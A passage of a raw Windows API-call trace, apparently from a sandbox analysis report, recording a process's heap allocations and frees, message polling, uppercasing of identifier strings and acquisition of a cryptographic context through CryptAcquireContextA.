Size=0x10) returned 0x24a9f48 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.517] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0207.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.517] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.518] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.520] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.521] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.521] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0207.521] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.521] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0207.521] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.522] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.522] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.522] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.522] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.522] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.522] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.522] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.523] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.523] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.523] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.523] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.523] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.524] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.524] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.525] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.525] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.525] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.525] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.525] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.526] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.526] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, 